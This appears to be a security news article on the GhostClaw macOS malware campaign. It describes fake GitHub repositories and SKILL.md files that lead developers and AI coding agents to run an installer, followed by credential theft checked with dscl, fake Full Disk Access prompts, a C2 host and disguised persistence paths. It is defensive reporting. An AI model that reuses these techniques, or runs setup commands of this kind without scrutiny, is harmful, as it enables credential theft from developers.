A newly documented malware campaign called GhostClaw is actively targeting macOS users through fake GitHub repositories and AI-assisted development workflows.
The campaign uses social engineering disguised as legitimate developer tools to steal user credentials and drop secondary payloads on infected systems.
GhostClaw first surfaced in early March 2026, when JFrog Security Research documented the initial campaign, then referred to as GhostClaw/GhostLoader.
The malware was distributed through malicious npm packages, targeting developers who routinely install tools from public package registries.
The campaign quickly spread beyond the npm ecosystem and into GitHub-hosted repositories that impersonated trading bots, software development kits, and other common developer utilities.
Jamf Threat Labs researchers identified eight samples linked to the same campaign after examining multiple GitHub repositories tied to the activity.
Their analysis uncovered additional infrastructure and previously unknown infection vectors, confirming that GhostClaw had expanded well beyond its original npm-based delivery method.
One notable repository, TradingView-Claw, had accumulated 386 GitHub stars, adding false credibility among unsuspecting users and developers.
TradingView-Claw repository, showing 386 stars (Source – Jamf)
What makes GhostClaw particularly dangerous is its dual infection approach. In one path, repositories contain README files with step-by-step installation instructions that prompt users to run a shell command using curl.
README file for the Antigravity Pack SDK (Source – Jamf)
In the second path, the malware targets AI coding agents through SKILL.md files that define metadata and execution commands, causing automated development tools to unknowingly trigger the infection chain.
This means GhostClaw can infect a system without any direct human involvement.
The impact of this campaign stretches beyond individual developers. By placing malicious code inside trusted ecosystems like GitHub and AI-assisted tooling, attackers were able to reach a larger number of systems through a single delivery mechanism.
Jamf Threat Labs also noted ties to related campaigns, including Glassworm and PolinRider, which used similar software supply chain techniques, pointing to a growing trend in the way attackers choose to distribute malware at scale.
Multi-Stage Infection and Credential Theft
Regardless of how the initial infection begins, GhostClaw follows a consistent multi-stage execution chain designed to harvest credentials and establish persistence on the victim’s system.
The process starts with install.sh, a bootstrapper script that presents itself as a routine setup tool. It checks the host macOS version and architecture, then silently installs a compatible version of Node.js in a user-controlled directory, avoiding any need for elevated privileges.
The script uses curl with the –insecure flag to download Node.js, bypassing TLS certificate verification — a behavior rarely seen in legitimate installers.
Execution then passes to setup.js, a heavily obfuscated JavaScript file responsible for credential collection.
To avoid raising suspicion, the script clears the terminal and displays fake progress indicators that mimic a legitimate SDK installation.
Installation process indicators and password prompt in Terminal (Source – Jamf)
A credential prompt then appears, and the supplied password is validated using the native macOS binary dscl with the -authonly option, allowing the malware to confirm stolen credentials without triggering standard system authentication dialogs.
If Full Disk Access is not already enabled, the malware presents AppleScript dialogs that closely resemble genuine macOS security prompts, walking the user through granting it in System Settings.
Once credentials are collected and access is secured, setup.js contacts the command-and-control server at trackpipe[.]dev to retrieve an encrypted secondary payload, which is written to a temporary file at /tmp/sys-opt-{random}.js.
The file is then deleted, and the malware establishes persistence by relocating itself to ~/.cache/.npm_telemetry/monitor.js — a path carefully built to blend into normal npm activity.
Users and developers should be particularly cautious when running installation commands from GitHub repositories or online guides, even when those sources appear credible.
Verifying the origin and behavior of any code before execution remains one of the most effective defenses.
Security teams managing macOS environments should watch for unexpected dscl usage for credential validation and monitor for processes attempting to gain Full Disk Access or writing obfuscated files to temporary directories.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post GhostClaw AI Assisted Malware Attacking macOS Users to Deploy Credential-Stealing Payloads appeared first on Cyber Security News.
